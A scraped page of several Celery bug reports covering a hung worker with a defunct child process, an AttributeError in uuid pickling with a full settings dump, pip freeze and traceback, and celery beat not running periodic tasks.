    I'm sure that the queue gets a task every minute, since our application issues a new 'odoo-8.0.cdr' task per minute (like a clock). I can see the backlog:

    root@mercurio:~# redis-cli -n 9  llen 'odoo-8.0.cdr'
    (integer) 4586
    

    One minute later:

    root@mercurio:~# redis-cli -n 9  llen 'odoo-8.0.cdr'
    (integer) 4587
    

    To resume operation I have to restart the whole worker. After the restart it works through the entire backlog (all tasks expire after 65s in the queue), and most of the time it keeps working even beyond the 2000th task.

    Killing the child process shows that the worker does not even reap the child:

    root@mercurio:~# ps ax | grep cdr
     9105 ?        S      2:32 [celeryd: [email protected]:MainProcess] -active- (celery worker -l INFO -n cdr-1@%h -c1 -Q odoo-8.0.cdr)
    23943 ?        Z      0:00 [[celeryd: cdr-1] <defunct>
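
    For context, the Z / <defunct> state in the ps output above is what any POSIX child shows after it has exited and before its parent has waited on it. The sketch below uses only the standard library and is not Celery or billiard code; the function name spawn_and_reap is made up for illustration. It shows the wait call that removes such an entry, which the hung main process apparently never reaches.

```python
import os


def spawn_and_reap():
    """Fork a child that exits at once, then reap it from the parent.

    Returns (child_pid, reaped_pid, exit_code).
    """
    pid = os.fork()
    if pid == 0:
        # Child: exit immediately without running any cleanup handlers.
        os._exit(0)

    # Parent: between the child's exit and this call, the child is a zombie
    # and would be listed as <defunct> by ps.
    reaped_pid, status = os.waitpid(pid, 0)
    exit_code = os.WEXITSTATUS(status) if os.WIFEXITED(status) else None
    return pid, reaped_pid, exit_code


if __name__ == "__main__":
    child, reaped, code = spawn_and_reap()
    print(child == reaped, code)
```

    A parent that is blocked elsewhere, for example in a recvfrom that never returns, does not get to make this call, so the killed child stays in the process table.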
    
    Worker Hangs Status: Needs Verification ✘ 
    opened by mvaled 50
  • AttributeError: int in uuid.py when being called by celery/concurrency/asynpool.py

    AttributeError: int in uuid.py when being called by celery/concurrency/asynpool.py

    Checklist

    • [ ] I have verified that the issue exists against the main branch of Celery.
    • [ ] This has already been asked to the discussions forum first.
    • [x] I have read the relevant section in the contribution guide on reporting bugs.
    • [x] I have checked the issues list for similar or identical bug reports.
    • [x] I have checked the pull requests list for existing proposed fixes.
    • [ ] I have checked the commit log to find out if the bug was already fixed in the main branch.
    • [x] I have included all related issues and possible duplicate issues in this issue (If there are none, check this box anyway).

    Mandatory Debugging Information

    • [x] I have included the output of celery -A proj report in the issue. (if you are not able to do this, then at least specify the Celery version affected).
    • [ ] I have verified that the issue exists against the main branch of Celery.
    • [x] I have included the contents of pip freeze in the issue.
    • [ ] I have included all the versions of all the external dependencies required to reproduce this bug.

    Optional Debugging Information

    • [x] I have tried reproducing the issue on more than one Python version and/or implementation.
    • [ ] I have tried reproducing the issue on more than one message broker and/or result backend.
    • [x] I have tried reproducing the issue on more than one version of the message broker and/or result backend.
    • [ ] I have tried reproducing the issue on more than one operating system.
    • [ ] I have tried reproducing the issue on more than one workers pool.
    • [ ] I have tried reproducing the issue with autoscaling, retries, ETA/Countdown & rate limits disabled.
    • [x] I have tried reproducing the issue after downgrading and/or upgrading Celery and its dependencies.

    Related Issues and Possible Duplicates

    Related Issues

    • None

    Possible Duplicates

    • None

    Environment & Settings

    Celery version:

    celery report Output:

    <unknown>:1: DeprecationWarning: invalid escape sequence \.
    <unknown>:1: DeprecationWarning: invalid escape sequence \:
    <unknown>:1: DeprecationWarning: invalid escape sequence \.
    <unknown>:1: DeprecationWarning: invalid escape sequence \:
    /usr/local/lib/python3.9/dist-packages/celery/utils/collections.py:163: RemovedInDjango40Warning: The PASSWORD_RESET_TIMEOUT_DAYS setting is deprecated. Use PASSWORD_RESET_TIMEOUT instead.
      return getattr(self.obj, key)
    
    software -> celery:5.2.7 (dawn-chorus) kombu:5.2.4 py:3.9.2
                billiard:3.6.4.0 py-amqp:5.1.1
    platform -> system:Linux arch:64bit
                kernel version:5.10.16.3-microsoft-standard-WSL2 imp:CPython
    loader   -> celery.loaders.app.AppLoader
    settings -> transport:pyamqp results:redis://redis/
    
    ABSOLUTE_URL_OVERRIDES: {
     }
    ADMINS: []
    ALLOWED_HOSTS: ['localhost',
     '127.0.0.1',
     '::1',
     'host.docker.internal',
     '10.0.2.2',
     '172.17.0.1']
    APPEND_SLASH: True
    AUTHENTICATION_BACKENDS: ['django.contrib.auth.backends.ModelBackend']
    AUTH_PASSWORD_VALIDATORS: '********'
    AUTH_USER_MODEL: 'auth.User'
    BASE_DIR: '/usr/src/app'
    CACHES: {
     'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'}}
    CACHE_MIDDLEWARE_ALIAS: 'default'
    CACHE_MIDDLEWARE_KEY_PREFIX: '********'
    CACHE_MIDDLEWARE_SECONDS: 600
    CELERY_ACCEPT_CONTENT: ['customjson']
    CELERY_BROKER_URL: 'amqp://guest:********@rabbitmq:5672//'
    CELERY_ENABLE_UTC: True
    CELERY_RESULT_BACKEND: 'redis://redis/'
    CELERY_RESULT_SERIALIZER: 'customjson'
    CELERY_TASK_SERIALIZER: 'customjson'
    CELERY_TIMEZONE: 'Europe/Amsterdam'
    <private>
    CRON_CLASSES: ['geocatalog.cron.UpdateCswTables']
    CSRF_COOKIE_AGE: 31449600
    CSRF_COOKIE_DOMAIN: None
    CSRF_COOKIE_HTTPONLY: False
    CSRF_COOKIE_NAME: 'csrftoken'
    CSRF_COOKIE_PATH: '/'
    CSRF_COOKIE_SAMESITE: 'Lax'
    CSRF_COOKIE_SECURE: False
    CSRF_FAILURE_VIEW: 'django.views.csrf.csrf_failure'
    CSRF_HEADER_NAME: 'HTTP_X_CSRFTOKEN'
    CSRF_TRUSTED_ORIGINS: []
    CSRF_USE_SESSIONS: False
    DATABASES: {
        'default': {   'ATOMIC_REQUESTS': False,
                       'AUTOCOMMIT': True,
                       'CONN_MAX_AGE': 0,
                       'ENGINE': 'django.db.backends.postgresql',
                       'HOST': 'host.docker.internal',
                       'NAME': 'osmgmt',
                       'OPTIONS': {},
                       'PASSWORD': '********',
                       'PORT': '5432',
                       'TEST': {   'CHARSET': None,
                                   'COLLATION': None,
                                   'MIGRATE': True,
                                   'MIRROR': None,
                                   'NAME': None},
                       'TIME_ZONE': None,
                       'USER': 'django'}}
    DATABASE_ROUTERS: '********'
    <private>
    DATA_UPLOAD_MAX_MEMORY_SIZE: 2621440
    DATA_UPLOAD_MAX_NUMBER_FIELDS: 1000
    DATETIME_FORMAT: 'N j, Y, P'
    DATETIME_INPUT_FORMATS: ['%Y-%m-%d %H:%M:%S',
     '%Y-%m-%d %H:%M:%S.%f',
     '%Y-%m-%d %H:%M',
     '%m/%d/%Y %H:%M:%S',
     '%m/%d/%Y %H:%M:%S.%f',
     '%m/%d/%Y %H:%M',
     '%m/%d/%y %H:%M:%S',
     '%m/%d/%y %H:%M:%S.%f',
     '%m/%d/%y %H:%M']
    DATE_FORMAT: 'N j, Y'
    DATE_INPUT_FORMATS: ['%Y-%m-%d',
     '%m/%d/%Y',
     '%m/%d/%y',
     '%b %d %Y',
     '%b %d, %Y',
     '%d %b %Y',
     '%d %b, %Y',
     '%B %d %Y',
     '%B %d, %Y',
     '%d %B %Y',
     '%d %B, %Y']
    DEBUG: 1
    DEBUG_PROPAGATE_EXCEPTIONS: False
    DECIMAL_SEPARATOR: '.'
    DEFAULT_AUTO_FIELD: 'django.db.models.AutoField'
    DEFAULT_CHARSET: 'utf-8'
    DEFAULT_EXCEPTION_REPORTER: 'django.views.debug.ExceptionReporter'
    DEFAULT_EXCEPTION_REPORTER_FILTER: 'django.views.debug.SafeExceptionReporterFilter'
    DEFAULT_FILE_STORAGE: 'django.core.files.storage.FileSystemStorage'
    <private>
    DEFAULT_HASHING_ALGORITHM: 'sha256'
    DEFAULT_INDEX_TABLESPACE: ''
    DEFAULT_TABLESPACE: ''
    DISALLOWED_USER_AGENTS: []
    EMAIL_BACKEND: 'django.core.mail.backends.smtp.EmailBackend'
    EMAIL_HOST: 'mailhost.domain.com'
    EMAIL_HOST_PASSWORD: '********'
    EMAIL_HOST_USER: '[email protected]'
    EMAIL_PORT: '465'
    EMAIL_SSL_CERTFILE: None
    EMAIL_SSL_KEYFILE: '********'
    EMAIL_SUBJECT_PREFIX: '[Django] '
    EMAIL_TIMEOUT: None
    EMAIL_USE_LOCALTIME: False
    EMAIL_USE_SSL: 'True'
    EMAIL_USE_TLS: False
    <private>
    FILE_UPLOAD_DIRECTORY_PERMISSIONS: None
    FILE_UPLOAD_HANDLERS: ['django.core.files.uploadhandler.MemoryFileUploadHandler',
     'django.core.files.uploadhandler.TemporaryFileUploadHandler']
    FILE_UPLOAD_MAX_MEMORY_SIZE: 2621440
    FILE_UPLOAD_PERMISSIONS: 420
    FILE_UPLOAD_TEMP_DIR: None
    FIRST_DAY_OF_WEEK: 0
    FIXTURE_DIRS: []
    FORCE_SCRIPT_NAME: None
    FORMAT_MODULE_PATH: None
    FORM_RENDERER: 'django.forms.renderers.DjangoTemplates'
    <private>
    IGNORABLE_404_URLS: []
    INSTALLED_APPS: ['config.apps.ConfigConfig',
     'dataupload.apps.DatauploadConfig',
     'gds.apps.GdsConfig',
     'mapcomposer.apps.MapcomposerConfig',
     'workflow.apps.WorkflowConfig',
     'django.contrib.admin',
     'django.contrib.auth',
     'django.contrib.contenttypes',
     'django.contrib.sessions',
     'django.contrib.messages',
     'django.contrib.staticfiles',
     'django_cron',
     'polymorphic',
     'rest_framework',
     'taggit']
    INTERNAL_IPS: []
    <private>
    LANGUAGES: [('af', 'Afrikaans'),
     ('ar', 'Arabic'),
     ('ar-dz', 'Algerian Arabic'),
     ('ast', 'Asturian'),
     ('az', 'Azerbaijani'),
     ('bg', 'Bulgarian'),
     ('be', 'Belarusian'),
     ('bn', 'Bengali'),
     ('br', 'Breton'),
     ('bs', 'Bosnian'),
     ('ca', 'Catalan'),
     ('cs', 'Czech'),
     ('cy', 'Welsh'),
     ('da', 'Danish'),
     ('de', 'German'),
     ('dsb', 'Lower Sorbian'),
     ('el', 'Greek'),
     ('en', 'English'),
     ('en-au', 'Australian English'),
     ('en-gb', 'British English'),
     ('eo', 'Esperanto'),
     ('es', 'Spanish'),
     ('es-ar', 'Argentinian Spanish'),
     ('es-co', 'Colombian Spanish'),
     ('es-mx', 'Mexican Spanish'),
     ('es-ni', 'Nicaraguan Spanish'),
     ('es-ve', 'Venezuelan Spanish'),
     ('et', 'Estonian'),
     ('eu', 'Basque'),
     ('fa', 'Persian'),
     ('fi', 'Finnish'),
     ('fr', 'French'),
     ('fy', 'Frisian'),
     ('ga', 'Irish'),
     ('gd', 'Scottish Gaelic'),
     ('gl', 'Galician'),
     ('he', 'Hebrew'),
     ('hi', 'Hindi'),
     ('hr', 'Croatian'),
     ('hsb', 'Upper Sorbian'),
     ('hu', 'Hungarian'),
     ('hy', 'Armenian'),
     ('ia', 'Interlingua'),
     ('id', 'Indonesian'),
     ('ig', 'Igbo'),
     ('io', 'Ido'),
     ('is', 'Icelandic'),
     ('it', 'Italian'),
     ('ja', 'Japanese'),
     ('ka', 'Georgian'),
     ('kab', 'Kabyle'),
     ('kk', 'Kazakh'),
     ('km', 'Khmer'),
     ('kn', 'Kannada'),
     ('ko', 'Korean'),
     ('ky', 'Kyrgyz'),
     ('lb', 'Luxembourgish'),
     ('lt', 'Lithuanian'),
     ('lv', 'Latvian'),
     ('mk', 'Macedonian'),
     ('ml', 'Malayalam'),
     ('mn', 'Mongolian'),
     ('mr', 'Marathi'),
     ('my', 'Burmese'),
     ('nb', 'Norwegian Bokmål'),
     ('ne', 'Nepali'),
     ('nl', 'Dutch'),
     ('nn', 'Norwegian Nynorsk'),
     ('os', 'Ossetic'),
     ('pa', 'Punjabi'),
     ('pl', 'Polish'),
     ('pt', 'Portuguese'),
     ('pt-br', 'Brazilian Portuguese'),
     ('ro', 'Romanian'),
     ('ru', 'Russian'),
     ('sk', 'Slovak'),
     ('sl', 'Slovenian'),
     ('sq', 'Albanian'),
     ('sr', 'Serbian'),
     ('sr-latn', 'Serbian Latin'),
     ('sv', 'Swedish'),
     ('sw', 'Swahili'),
     ('ta', 'Tamil'),
     ('te', 'Telugu'),
     ('tg', 'Tajik'),
     ('th', 'Thai'),
     ('tk', 'Turkmen'),
     ('tr', 'Turkish'),
     ('tt', 'Tatar'),
     ('udm', 'Udmurt'),
     ('uk', 'Ukrainian'),
     ('ur', 'Urdu'),
     ('uz', 'Uzbek'),
     ('vi', 'Vietnamese'),
     ('zh-hans', 'Simplified Chinese'),
     ('zh-hant', 'Traditional Chinese')]
    LANGUAGES_BIDI: ['he', 'ar', 'ar-dz', 'fa', 'ur']
    LANGUAGE_CODE: 'nl-nl'
    LANGUAGE_COOKIE_AGE: None
    LANGUAGE_COOKIE_DOMAIN: None
    LANGUAGE_COOKIE_HTTPONLY: False
    LANGUAGE_COOKIE_NAME: 'django_language'
    LANGUAGE_COOKIE_PATH: '/'
    LANGUAGE_COOKIE_SAMESITE: None
    LANGUAGE_COOKIE_SECURE: False
    LOCALE_PATHS: []
    LOGGING: {
        'disable_existing_loggers': False,
        'formatters': {   'verbose': {   'format': '{asctime} - {module} - '
                                                   '{levelname} - {message}',
                                         'style': '{'}},
        'handlers': {   'console': {   'class': 'logging.StreamHandler',
                                       'formatter': 'verbose'}},
        'loggers': {   'etl': {   'handlers': ['console'],
                                  'level': 'INFO',
                                  'propagate': False}},
        'version': 1}
    LOGGING_CONFIG: 'logging.config.dictConfig'
    LOGIN_REDIRECT_URL: '/'
    LOGIN_URL: '/accounts/login/'
    LOGOUT_REDIRECT_URL: None
    MANAGERS: []
    MEDIA_ROOT: '/media'
    MEDIA_URL: '/'
    MESSAGE_STORAGE: 'django.contrib.messages.storage.fallback.FallbackStorage'
    MIDDLEWARE: ['django.middleware.security.SecurityMiddleware',
     'django.contrib.sessions.middleware.SessionMiddleware',
     'django.middleware.common.CommonMiddleware',
     'django.middleware.csrf.CsrfViewMiddleware',
     'django.contrib.auth.middleware.AuthenticationMiddleware',
     'django.contrib.messages.middleware.MessageMiddleware',
     'django.middleware.clickjacking.XFrameOptionsMiddleware']
    MIGRATION_MODULES: {
     }
    MONTH_DAY_FORMAT: 'F j'
    NUMBER_GROUPING: 0
    <private>
    PASSWORD_HASHERS: '********'
    PASSWORD_RESET_TIMEOUT: '********'
    PASSWORD_RESET_TIMEOUT_DAYS: '********'
    PREPEND_WWW: False
    REST_FRAMEWORK: {
        'DEFAULT_AUTHENTICATION_CLASSES': [   'rest_framework.authentication.SessionAuthentication',
                                              'rest_framework.authentication.BasicAuthentication',
                                              'rest_framework_simplejwt.authentication.JWTAuthentication'],
        'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
        'DEFAULT_PERMISSION_CLASSES': [   'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'],
        'PAGE_SIZE': 10}
    ROOT_URLCONF: 'osmgmt.urls'
    SECRET_KEY: '********'
    SECURE_BROWSER_XSS_FILTER: False
    SECURE_CONTENT_TYPE_NOSNIFF: True
    SECURE_HSTS_INCLUDE_SUBDOMAINS: False
    SECURE_HSTS_PRELOAD: False
    SECURE_HSTS_SECONDS: 0
    SECURE_PROXY_SSL_HEADER:
        ('HTTP_X_FORWARDED_PROTO', 'https')
    SECURE_REDIRECT_EXEMPT: []
    SECURE_REFERRER_POLICY: 'same-origin'
    SECURE_SSL_HOST: None
    SECURE_SSL_REDIRECT: False
    SERVER_EMAIL: '[email protected]'
    SESSION_CACHE_ALIAS: 'default'
    SESSION_COOKIE_AGE: 1800
    SESSION_COOKIE_DOMAIN: None
    SESSION_COOKIE_HTTPONLY: True
    SESSION_COOKIE_NAME: 'sessionid'
    SESSION_COOKIE_PATH: '/'
    SESSION_COOKIE_SAMESITE: 'Lax'
    SESSION_COOKIE_SECURE: False
    SESSION_ENGINE: 'django.contrib.sessions.backends.db'
    SESSION_EXPIRE_AT_BROWSER_CLOSE: False
    SESSION_FILE_PATH: None
    SESSION_SAVE_EVERY_REQUEST: True
    SESSION_SERIALIZER: 'django.contrib.sessions.serializers.JSONSerializer'
    SETTINGS_MODULE: 'osmgmt.settings'
    SHORT_DATETIME_FORMAT: 'm/d/Y P'
    SHORT_DATE_FORMAT: 'm/d/Y'
    SIGNING_BACKEND: 'django.core.signing.TimestampSigner'
    SILENCED_SYSTEM_CHECKS: []
    SIMPLE_JWT: {
        'ACCESS_TOKEN_LIFETIME': '********',
        'TOKEN_TYPE_CLAIM': '********',
        'USER_ID_CLAIM': 'user',
        'USER_ID_FIELD': 'username'}
    STATICFILES_DIRS: ['/usr/src/app/static',
     '/usr/src/app/dataupload/static']
    STATICFILES_FINDERS: ['django.contrib.staticfiles.finders.FileSystemFinder',
     'django.contrib.staticfiles.finders.AppDirectoriesFinder']
    STATICFILES_STORAGE: 'django.contrib.staticfiles.storage.StaticFilesStorage'
    STATIC_ROOT: '/usr/src/app/allstaticfiles'
    STATIC_URL: '/static/'
    TEMPLATES: [{'APP_DIRS': True,
      'BACKEND': 'django.template.backends.jinja2.Jinja2',
      'DIRS': [],
      'OPTIONS': {'environment': 'osmgmt.jinja2.environment'}},
     {'APP_DIRS': True,
      'BACKEND': 'django.template.backends.django.DjangoTemplates',
      'DIRS': ['/usr/src/app/templates'],
      'OPTIONS': {'context_processors': ['django.template.context_processors.debug',
                                         'django.template.context_processors.request',
                                         'django.contrib.auth.context_processors.auth',
                                         'django.contrib.messages.context_processors.messages']}}]
    TEST_NON_SERIALIZED_APPS: []
    TEST_RUNNER: 'django.test.runner.DiscoverRunner'
    THOUSAND_SEPARATOR: ','
    TIME_FORMAT: 'P'
    TIME_INPUT_FORMATS: ['%H:%M:%S', '%H:%M:%S.%f', '%H:%M']
    TIME_ZONE: 'Europe/Amsterdam'
    USE_I18N: True
    USE_L10N: True
    USE_THOUSAND_SEPARATOR: True
    USE_TZ: False
    USE_X_FORWARDED_HOST: True
    USE_X_FORWARDED_PORT: False
    WSGI_APPLICATION: 'osmgmt.wsgi.application'
    X_FRAME_OPTIONS: 'DENY'
    YEAR_MONTH_FORMAT: 'F Y'
    is_overridden: <bound method Settings.is_overridden of <Settings "osmgmt.settings">>
    deprecated_settings: None
    

    Steps to Reproduce

    Required Dependencies

    • Minimal Python Version: N/A or Unknown
    • Minimal Celery Version: N/A or Unknown
    • Minimal Kombu Version: N/A or Unknown
    • Minimal Broker Version: N/A or Unknown
    • Minimal Result Backend Version: N/A or Unknown
    • Minimal OS and/or Kernel Version: N/A or Unknown
    • Minimal Broker Client Version: N/A or Unknown
    • Minimal Result Backend Client Version: N/A or Unknown

    Python Packages

    pip freeze Output:

    amqp==5.1.1
    anyjson==0.3.3
    asgiref==3.6.0
    async-timeout==4.0.2
    attrs==22.2.0
    bcrypt==4.0.1
    billiard==3.6.4.0
    celery==5.2.7
    certifi==2022.12.7
    cffi==1.15.1
    charset-normalizer==2.0.12
    click==8.1.3
    click-didyoumean==0.0.3
    click-plugins==1.1.1
    click-repl==0.2.0
    cligj==0.7.2
    colorama==0.4.4
    contourpy==1.0.6
    cryptography==39.0.0
    cycler==0.11.0
    defusedxml==0.7.1
    Django==3.2.12
    django-cron==0.6.0
    django-polymorphic==3.1.0
    django-taggit==3.1.0
    djangorestframework==3.14.0
    djangorestframework-simplejwt==5.2.2
    ephem==3.7.7.1
    Fiona==1.8.22
    flower==1.2.0
    fonttools==4.38.0
    fpdf2==2.6.0
    geolinks==0.2.0
    geopandas==0.12.2
    greenlet==2.0.1
    humanize==4.4.0
    idna==3.4
    Jinja2==3.1.2
    jsonschema==4.17.3
    kiwisolver==1.4.4
    kombu==5.2.4
    lxml==4.9.2
    MarkupSafe==2.1.1
    matplotlib==3.6.2
    munch==2.5.0
    numpy==1.24.1
    OWSLib==0.27.2
    packaging==22.0
    pandas==1.5.2
    paramiko==2.12.0
    parsimonious==0.10.0
    Pillow==9.4.0
    prometheus-client==0.15.0
    prompt-toolkit==3.0.14
    psycopg2-binary==2.9.5
    pycparser==2.21
    pycsw==2.6.1
    Pygments==2.14.0
    PyJWT==2.6.0
    PyNaCl==1.5.0
    pyparsing==2.4.7
    PyPDF2==2.11.2
    pyproj==3.4.1
    pyrsistent==0.19.3
    python-dateutil==2.8.1
    python-memcached==1.58
    pytz==2022.7
    PyYAML==6.0
    redis==4.4.0
    regex==2022.10.31
    requests==2.28.1
    scp==0.14.4
    Shapely==1.8.5.post1
    six==1.16.0
    SQLAlchemy==1.4.45
    sqlparse==0.4.3
    tornado==6.2
    typing_extensions==4.4.0
    Unidecode==1.3.6
    urllib3==1.26.13
    vine==5.0.0
    wcwidth==0.1.9
    xmltodict==0.13.0
    

    Other Dependencies

    • OS: Linux Debian Buster - Bullseye (in Docker on Windows)
    • Python: 3.7 - 3.9
    • Django: 3.2.12
    • Celery: 5.0.5 - 5.2.7
    • Kombu: 5.0.2 - 5.2.4
    • librabbitmq 2.0.0 or amqp 5.1.1

    Minimally Reproducible Test Case

    Expected Behavior

    The task submitted to the broker is being processed happily by Celery.

    Actual Behavior

    The following error occurs:

    celery_1         | [2023-01-03 16:58:29,653: CRITICAL/MainProcess] Unrecoverable error: AttributeError('int')
    celery_1         | Traceback (most recent call last):
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/worker/worker.py", line 203, in start
    celery_1         |     self.blueprint.start(self)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/bootsteps.py", line 116, in start
    celery_1         |     step.start(parent)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/bootsteps.py", line 365, in start
    celery_1         |     return self.obj.start()
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/worker/consumer/consumer.py", line 332, in start
    celery_1         |     blueprint.start(self)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/bootsteps.py", line 116, in start
    celery_1         |     step.start(parent)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/worker/consumer/consumer.py", line 628, in start
    celery_1         |     c.loop(*c.loop_args())
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/worker/loops.py", line 97, in asynloop
    celery_1         |     next(loop)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/kombu/asynchronous/hub.py", line 362, in create_loop
    celery_1         |     cb(*cbargs)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/kombu/transport/base.py", line 235, in on_readable
    celery_1         |     reader(loop)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/kombu/transport/base.py", line 217, in _read
    celery_1         |     drain_events(timeout=0)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/amqp/connection.py", line 525, in drain_events
    celery_1         |     while not self.blocking_read(timeout):
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/amqp/connection.py", line 531, in blocking_read
    celery_1         |     return self.on_inbound_frame(frame)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/amqp/method_framing.py", line 77, in on_frame
    celery_1         |     callback(channel, msg.frame_method, msg.frame_args, msg)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/amqp/connection.py", line 537, in on_inbound_method
    celery_1         |     return self.channels[channel_id].dispatch_method(
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/amqp/abstract_channel.py", line 156, in dispatch_method
    celery_1         |     listener(*args)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/amqp/channel.py", line 1629, in _on_basic_deliver
    celery_1         |     fun(msg)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/kombu/messaging.py", line 626, in _receive_callback
    celery_1         |     return on_m(message) if on_m else self.receive(decoded, message)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/worker/consumer/consumer.py", line 596, in on_task_received
    celery_1         |     strategy(
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/worker/strategy.py", line 207, in task_message_handler
    celery_1         |     handle(req)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/worker/worker.py", line 221, in _process_task_sem
    celery_1         |     return self._quick_acquire(self._process_task, req)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/kombu/asynchronous/semaphore.py", line 54, in acquire
    celery_1         |     callback(*partial_args, **partial_kwargs)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/worker/worker.py", line 226, in _process_task
    celery_1         |     req.execute_using_pool(self.pool)
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/worker/request.py", line 707, in execute_using_pool
    celery_1         |     result = apply_async(
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/concurrency/base.py", line 152, in apply_async
    celery_1         |     return self.on_apply(target, args, kwargs,
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/billiard/pool.py", line 1530, in apply_async
    celery_1         |     self._quick_put((TASK, (result._job, None, func, args, kwds)))
    celery_1         |   File "/usr/local/lib/python3.9/dist-packages/celery/concurrency/asynpool.py", line 866, in send_job
    celery_1         |     body = dumps(tup, protocol=protocol)
    celery_1         |   File "/usr/lib/python3.9/uuid.py", line 225, in __getstate__
    celery_1         |     d = {'int': self.int}
    celery_1         | AttributeError: int
    

    This happens after a task has been placed in RabbitMQ (broker) by Django, and is about to be handled by my worker (celery_1 container). The task is using the Celery canvas.

    In Python 3.7 the actual error is a bit different, but it also occurs in the __getstate__ method in uuid.py. At that time I was able to patch this error by using my own version of uuid.py. I've added the check self.is_safe is not None. Relevant part:

        def __getstate__(self):
            state = self.__dict__.copy()
            if self.is_safe != SafeUUID.unknown:
                # is_safe is a SafeUUID instance.  Return just its value, so that
                # it can be un-pickled in older Python versions without SafeUUID.
                state['is_safe'] = self.is_safe.value
            else:
                # omit is_safe when it is "unknown"
                del state['is_safe']
            return state
    

    After this everything seemed to proceed as normal.

    Python 3.9 code for reference where this error occurs (see stack trace):

        def __getstate__(self):
            d = {'int': self.int}
            if self.is_safe != SafeUUID.unknown:
                # is_safe is a SafeUUID instance.  Return just its value, so that
                # it can be un-pickled in older Python versions without SafeUUID.
                d['is_safe'] = self.is_safe.value
            return d
    

    The file uuid.py in my container is identical to the one here: https://github.com/python/cpython/blob/3.9/Lib/uuid.py

    However, now it is time to use Python 3.9 (provided by Debian Bullseye), and I'm not able to work around this issue by fiddling with uuid.py. When I added a fix to the missing 'int' attribute (for example by setting it to 0), a similar error occurs somewhere else. I haven't tried patching uuid.py all over the place. Since this issue is occurring with multiple Celery versions and two different Python versions, I finally took the time to submit the bug report.

    I have no clue what causes this, since the stack trace is very deep, but I assume it is related to serialization / deserialization of the message ID (which is a UUID). It seems to me that the __init__ method is never called when the UUID object is created. I could verify this by adding print statements to uuid.py in both the __init__ method and the __getstate__ method. The print statement in the __getstate__ method reported a different ID (print(id(self))) than any of the IDs printed in __init__.
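
    The symptom described above can be reproduced in isolation with the standard library alone. This is a minimal sketch, assuming the object really is allocated without __init__ ever running; it says nothing about where in Celery, Kombu or billiard that would happen. The helper names are made up for illustration.

```python
import pickle
import uuid


def getstate_fails_without_init():
    """Return True if a UUID allocated without __init__ cannot build its pickle state."""
    # __new__ allocates the instance but skips __init__, so the 'int' and
    # 'is_safe' attributes are never set.
    bare = uuid.UUID.__new__(uuid.UUID)
    try:
        bare.__getstate__()
    except AttributeError:
        return True
    return False


def roundtrip(value):
    """Pickle and unpickle a value, as a pool would when handing it to a child process."""
    return pickle.loads(pickle.dumps(value, protocol=pickle.HIGHEST_PROTOCOL))


if __name__ == "__main__":
    normal = uuid.UUID("d0b6b9da-9503-4f3b-ae9e-bbb69f7412d5")
    print(roundtrip(normal) == normal)
    print(getstate_fails_without_init())
```

    A UUID built through the normal constructor pickles without trouble, so the failure points at how the instance was created rather than at __getstate__ itself.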

    I've tried to mitigate this issue by using Celery versions 5.0.5 - 5.2.7 (originally I was using 5.2.3). I've also switched from librabbitmq to the amqp Python lib. I've also tried to use Kombu 5.0.2 (together with Celery 5.0.5).

    It is possible that this is actually caused by an issue in Kombu or Billiard.

    Issue Type: Bug Report 
    opened by fsteggink 4
  • Celery beat stuck on start

    Celery beat stuck on start

    Celery beat doesn't run periodic tasks, yet delayed tasks are processed normally.

    I start Celery with celery -A app.celery worker -B -l info

    The startup log is as follows:

     -------------- celery@mxmaslin-Mac-mini.local v5.2.7 (dawn-chorus)
    --- ***** ----- 
    -- ******* ---- Darwin-22.1.0-arm64-arm-64bit 2022-12-24 17:53:01
    - *** --- * --- 
    - ** ---------- [config]
    - ** ---------- .> app:         app:0x104c92f88
    - ** ---------- .> transport:   redis://localhost:6379//
    - ** ---------- .> results:     disabled://
    - *** --- * --- .> concurrency: 8 (prefork)
    -- ******* ---- .> task events: OFF (enable -E to monitor tasks in this worker)
    --- ***** ----- 
     -------------- [queues]
                    .> celery           exchange=celery(direct) key=celery
                    
    
    [tasks]
      . tasks.periodic_send_messages
      . tasks.send_messages
    
    [2022-12-24 17:53:01,770: INFO/MainProcess] Connected to redis://localhost:6379//
    [2022-12-24 17:53:01,771: INFO/MainProcess] mingle: searching for neighbors
    [2022-12-24 17:53:02,422: INFO/Beat] beat: Starting...
    [2022-12-24 17:53:02,780: INFO/MainProcess] mingle: all alone
    [2022-12-24 17:53:02,802: INFO/MainProcess] celery@ mxmaslin-Mac-mini.local ready.
    [2022-12-25 07:00:00,019: INFO/Beat] Scheduler: Sending due task celery.backend_cleanup (celery.backend_cleanup)
    [2022-12-25 07:00:00,031: INFO/MainProcess] Task celery.backend_cleanup[94338a6f-22d1-43e8-b640-132b779f116b] received
    [2022-12-25 07:00:00,035: INFO/ForkPoolWorker-8] Task celery.backend_cleanup[94338a6f-22d1-43e8-b640-132b779f116b] succeeded in 0.0008972089999588206s: None
    

    The code is as follows:

    from datetime import timedelta
    from celery import Celery
    from celery.utils.log import get_task_logger
    
    celery = Celery(
        __name__,
        broker='redis://localhost:6379',
        include=['tasks']
    )
    celery.conf.timezone = 'UTC'
    
